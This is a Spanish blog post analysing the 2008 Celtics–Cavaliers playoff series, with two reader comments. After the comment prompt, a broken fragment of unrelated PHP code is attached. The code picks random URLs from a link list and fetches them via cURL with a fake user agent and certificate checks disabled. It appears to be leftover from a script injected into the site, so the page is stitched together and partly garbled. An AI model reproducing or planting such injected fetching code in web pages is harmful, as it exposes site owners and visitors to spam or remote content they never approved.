ANÁLISIS: BOSTON 4 – CLEVELAND 3

20 de May de 2008 por TheDeerHunter

Ha vuelto a suceder. El mejor equipo de la liga regular, uno de los más claros favoritos al título desde el principio, vuelve a sufrir hasta el límite contra el rival de turno. Pudimos pensar que lo de los Hawks fue más producto de la sorpresa y de la sobremotivación de sus jóvenes jugadores que de problemas reales de Boston. Pensamos que a partir de ese susto cerrarían filas y subirían el nivel contra a los siguientes compromisos. Nada más lejos de la realidad, otra vez sufrimiento. Otra vez jugándosela al cara o cruz en el último partido. Desaparecidos algunos de sus jugadores clave. Partidos malos y otros rematadamente malos… Algo extrañosucede en Boston, es evidente que no son el mismo equipo que hemos podido disfrutar este año. Dan la imagen de edificio viejo, que empiezan a notársele signos evidentes del paso del tiempo, pero que todavía se mantiene en pie, no sabemos muy bien cómo.

Podríamos pensar que esta eliminatoria no ha tenido nada de especial. La clásica eliminatoria del este, con equipos defensivos puros como los de hace no tanto, sin concesión al talento ni al espectáculo, con ese complejo de inferioridad contra sus primos del Oeste que sobrevino cuando se fue M.J. Pero es que Boston no tiene nada que envidiar a aquellos equipos y lo demostró en la regular. Cleveland es un equipo rocoso, pero todo aquel que haya seguido la eliminatoria ha podido comprobar que no lo es tanto como para provocar un cataclismo ofensivo de esta magnitud en un equipo de las características de Celtics. En aquel tiro de Allen que le mandó al banco durante toda la segunda parte del partido decisivo no lo defendía nadie y su cara en los tiros libres de la victoria lo decía todo. No son tan increíblemente grandes defensores como para convertir esta eliminatoria en una oda a la defensa o en un clínic de como hacer batir récords históricos negativos de anotación y eficacia. Simplemente los jugadores se están borrando por momentos y el equipo cada vez anda más justo.

Es más normal, sin embargo, que Boston haya logrado minimizar a Lebron algunos partidos. El Elegido es muy grande, casi indefendible, pero tiene un juego tan físico que se va haciendo previsible hasta casi la obsesión y sus compañeros apenas intervienen en ataque. La imagen colectiva que venía dando Cleveland también había sido bastante negativa… y esta serie no ha sido más que una confirmación. A pesar de todo han estado extremadamente cerca de volverla a armar. Seguramente se acordarán del primer partido y de aquella entrada, que hubiera roto de una vez por todas la ventaja campo “inexpugnable” que ha marcado las dos series de los verdes.

Nos queda la duda de la grandeza de Lebron. De cómo es capaz él sólo de arrasar a todo un equipo defendiéndole o cual es la causa de ir siempre sólo contra todo el equipo contrario. Hacia dónde se está dirigiendo su modelo de juego o qué sería capaz de hacer con la ayuda adecuada. Y ¿cuál podría ser la ayuda adecuada?

Algunas dudas las resolveremos pronto. Otras… a partir de Noviembre.

Comenta

2 comentarios a esta entrada

  1. txusma dice:
    #1

    Como se comentaba en otro artículo anterior: El árbol de Lebron es tan y tan grande que surgen dudas de si algo puede crecer a su sombra.

      Citar

  2. Gallis dice:
    #2

    Pues ahora que se ha acabado, tengo que reconocer que muy bien, mucha tensión y tal…pero esta serie ha sido una mierda. El comienzo de Lebron y los Cavs es digno de un equipo LEB y la imagen de los Celtics en Cleveland fue decepcionante.

    Si exceptuamos el duelo final entre Pierce y Lebron, sencillamente espectacular, el resto de la serie es para olvidar. A Detroit no se le gana con este nivel…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>